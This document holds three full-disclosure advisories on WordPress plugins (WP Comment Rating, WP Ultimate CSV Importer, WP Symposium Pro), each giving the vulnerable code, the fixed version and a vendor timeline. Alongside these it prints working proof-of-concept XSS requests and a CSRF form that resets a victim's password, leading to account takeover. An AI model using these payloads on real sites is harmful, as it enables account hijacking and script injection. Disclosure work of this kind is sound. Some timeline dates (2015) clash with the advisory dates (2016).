WP-Comment-Rating XSS Vulnerability

## FULL DISCLOSURE

#Product : wp-comment-rating
#Exploit Author : Rahul Pratap Singh
#Version : 1.5.0
#Home page Link : http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“tab” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: wpb_plugin_admin_page.php

line:194
$this->current_tab = isset( $_GET[‘tab’] ) ? $_GET[‘tab’] : ”;

line:553
$active_tab = $this->current_tab;

line:558
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ? $this->tabs[0]->
get_id() : $active_tab;

line:561
<div class=”wrap wrap-<?php echo $this->page_hook . ‘ active-tab-‘ .
$active_tab; ?>”>

—————————————-
Exploit:
—————————————-
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab=”>
< input type=text onclick=alert(/XSS/)><!–

—————————————-
POC:
—————————————-
wpcommentratingxsspoc

Fix:
Update to 1.5.4

Vulnerability Disclosure Timeline:
→ January 24, 2015  – Bug discovered, initial report to Vendor
→ January 25, 2015  – Vendor Acknowledged
→ January 27, 2015  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710

WP-Ultimate CSV Importer XSS Vulnerability

## FULL DISCLOSURE

#Product : WP-Ultimate CSV Importer
#Exploit Author : Rahul Pratap Singh
#Version : 3.8.6
#Home page Link : https://wordpress.org/plugins/wp-ultimate-csv-importer
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“alertmsg” parameter is not sanitized that leads to reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: /wp-ultimate-csv-importer/index.php

Found at line:256
echo __($_POST[‘alertmsg’],’wp-ultimate-csv-importer’);

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin-ajax.php

action=trans_alert_str&alertmsg=<input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)>

—————————————-
POC:
—————————————-
wp-ultimate-csv-importerxsspoc

Fix:
Update to 3.8.8

Vulnerability Disclosure Timeline:
→ January 14, 2015  – Bug discovered, initial report to Vendor
→ January 14, 2015  – Vendor acknowledged and scheduled a fix
→ January 18, 2015  – Reported to wordpress
→ January 19, 2015  – WordPress Response, plugin taken down
→ January 26, 2015  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/wp-ultimate-csv-importer/changelog/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

WP Symposium Pro Social Network Plugin XSS and Critical CSRF Vulnerability

##FULL DISCLOSURE

#Product                     : WP Symposium Pro Social Network plugin
#Exploit Author      : Rahul Pratap Singh
#Version                     : 15.12
#Website                    : 0x62626262.wordpress.com
#Twitter                     : @0x62626262
#Linkedin                  : https://in.linkedin.com/in/rahulpratapsingh94

#Date                          : 8/Jan/2016

1) XSS Vulnerability:

Vulnerable Code:

file: wps_usermeta_shortcodes.php

“wpspro_country” parameter is not sanitized, that leads to persistent xss.

Video Demonstration:

2) CSRF Vulnerability:

Description:

Edit profile page is vulnerable to CSRF, that allows to change password which in turn leads to full account takeover.

Exploit:

<html >
  <body >
    <form action=”http://localhost/wp422/wordpress/index.php/edit-profile/” method=”POST” enctype=”multipart/form-data” >
      <input type=”hidden” name=”wps_usermeta_change_update” value=”yes” / >
      <input type=”hidden” name=”wpspro_display_name” value=”rahul” / >
      <input type=”hidden” name=”wpspro_firstname” value=”hello1″ / >
      <input type=”hidden” name=”wpspro_lastname” value=”hello2″ / >
      <input type=”hidden” name=”wpspro_email” value=” ” / >
      <input type=”hidden” name=”wpsro_home” value=”hello4″ / >
      <input type=”hidden” name=”wpspro_country” value=”hello5″ / >
      <input type=”hidden” name=”wpspro_password” value=”asdf” / >
      <input type=”hidden” name=”wpspro_password2″ value=”asdf” / >
      <input type=”submit” value=”Submit request” / >
    </form >
  </body >

</html >

Video Demonstration:

Fix:
Update to version 16.1

Disclosure Timeline:

reported to vendor  : 6/1/2016
vendor response     : 6/1/2016
vendor acknowledged : 6/1/2016
vendor scheduled a patch: 7/1/2016
CVE Number : Not assigned yet